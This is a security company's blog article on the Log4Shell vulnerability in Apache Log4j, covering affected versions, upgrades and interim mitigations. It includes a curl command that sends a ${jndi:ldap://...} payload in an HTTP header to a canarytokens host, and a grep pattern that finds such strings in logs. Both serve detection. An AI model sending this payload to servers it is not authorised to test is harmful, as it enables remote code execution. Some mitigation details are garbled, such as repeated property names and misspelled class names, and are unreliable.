Log4Shell: Log4j 0-day Remote Code Execution Vulnerability (CVE-2021-44228 & CVE-2021-45046)

Log4j is a Java logging library that allows developers to log messages from their applications. A vulnerability has been found in Log4J that could allow an attacker to execute arbitrary code. The vulnerability specifically affects the way Log4J handles JNDI lookups. An attacker who can send LDAP-like query can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. This vulnerability was first discovered in version 2.15.0, but has been fixed in later versions. Versions 2.17.0 and later completely remove this functionality.

What is Log4Shell or Log4j?

Recently, a critical vulnerability is detected on Apache Log4J2 library that is used by a lot of applications. This vulnerability that allows running codes remotely, has the highest score of criticality(CVSS Score:10) and is published with CVE-2021-44228 number. Because Log4J2 library is being used by lots of applications and the vulnerability’s affect is completely compromising the server, it is also known as “Log4Shell”.

This vulnerability is tweeted with its PoC code on December 9 for the first time:

Immediately after this tweet, different exploits are shared for this vulnerability in various platforms.

Who got affected by this vulnerability?

Upon the publication of this vulnerability, it is detected that many services are vulnerable to the exploits, even reputable ones including cloud services like Steam, Apple iCloud and applications like Minecraft. You can find the extensive list of large corporations from here. Since this vulnerability has the highest level of criticality, it is expected that this vulnerability will be the cause of big data breached that might occure in the future. You can learn about the Impact of Cybersecurity Breaches to Your Business in our blog. A Twitter user showed that Apple servers are affected by this vulnerability, by only changing the name of iPhone device.

If you are using an older version of Log4j, it is important to upgrade as soon as possible to protect your system from potential attacks. If you cannot upgrade for some reason, it is recommended to disable log message substitution completely. Servers with JDK versions greater than "6u211", "7u201", "8u191" and "11.0.1" are not affected by LDAP attack vectors, however, it is proven with different PoC codes, that they are vulnerable other attack vectors. An attack that target “org.Apache.naming.factory.BeanFactory” class that is in the servers of Apache Tomcat is discussed in this article, to give an example.

Which versions are affected by Apache Log4j?

Almost all log4j versions are affected by this vulnerability.

2.0-beta9 <= Apache log4j <= 2.16.0

As Security for Everyone Team, we suggest you to update your version to 2.17.0.

What precautions you can take against Log4Shell?

Log4J is a widely used logging library and so it is important to be aware of this vulnerability and take the necessary precautions to protect your system. As Security for Everyone team, we suggest updating your version to 2.17.0 which is the version that does not have this vulnerability, as a definite solution. You can use the following links for updating process:

• https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.17.0/
• https://logging.apache.org/log4j/2.x/download.html

Considering the library's common usage, and it would be slow to take action because of the dependencies of the library for service update, we can suggest the following actions to be taken as temporary solutions:

• You can block the requests created by attackers via writing rules in Web Application Firewall,
• You can deactivate the block that allows running codes remotely on log4f functions in applications. You need to mark one of the functions of log4j.formatMsgNoLookups and log4j.formatMsgNoLookups as "true" in the library.
• If it is possible, you can remove log4f function completely.
• You can close JNDI queries. To do that, you need to remove the JdniLookup and JdniManager classes from "log4j-core.jar".

How can I detect Log4J Vulnerabilities extensively?

You can detect if one of your servers are affected by this vulnerability via triggering a DNS query. The exploit that will be used will cause the server to try to receive some codes remotely. You can either use a free online DNS logging tool(which may cause someone else to learn if you have this vulnerability) or you can take a safer way which is to setup your own server to detect if the vulnerability was trigger.

You can generate a sample exploit code using CanaryTokens.org web application. This application has the ability to send you an email in case an application vulnerability is detected. The application would generate an exploit code like the one that is given below. You can run the exploit code using the "X-Api-Version" HTTP header with Curl tool using the command line given below.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://x${hostName}.L4J.RANDOM_STRING.canarytokens.com/a}'

Easier Way To Detect Log4Shell Vulnerabilities Extensively - Online Log4j Vulnerability Scanner Tools

There are easier ways to detect the Log4Shell via scanning for Log4j using Log4j vulnerability scanner tools we prepared for you.

Security For Everyone's Log4J/Log4Shell Vulnerability Scanner Tools:

• Apache Log4j Remote Code Injection Vulnerability CVE-2021-44228 Scanner
• Remote Code Injection in Apache Log4j CVE-2021-45046 - Log4Shell Scanner

You can use the following query to detect if there was any exploitation on your servers before you know it:

sudo egrep -i -r ‘\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+’ /var/log/

If you have any questions or concerns, please don't hesitate to contact us. If you'd like to optimize your cybersecurity with ethical hacking service. You can take a look at Stay safe online! You can request a pentest from our team of highly trained cybersecurity experts or learn How Ethical Hacking Could Optimize Your Cybersecurity.